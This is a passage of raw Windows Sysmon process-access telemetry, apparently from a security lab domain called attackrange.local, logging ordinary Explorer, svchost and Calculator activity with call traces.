22:12:48.163{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032717Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:48.163{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032716Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:48.163{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032715Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:48.163{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032714Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:48.163{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360761Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360760Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360759Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360758Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360757Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360756Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.515{8e433fbf-337b-6013-8402-000000001100}16568196C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360755Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.515{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360754Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.515{8e433fbf-337b-6013-8402-000000001100}16568196C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360753Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360752Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360751Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360750Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360749Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360748Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360747Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1ca30|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000360746Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1c8fa|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000360745Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+1c8c2|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf 10341000x8000000000000000360744Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+2976b|c:\windows\system32\capabilityaccessmanager.dll+1c7d5|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000360743Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+28ff4|c:\windows\system32\capabilityaccessmanager.dll+1c666|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000360742Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360741Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360740Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.499{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360739Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.483{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 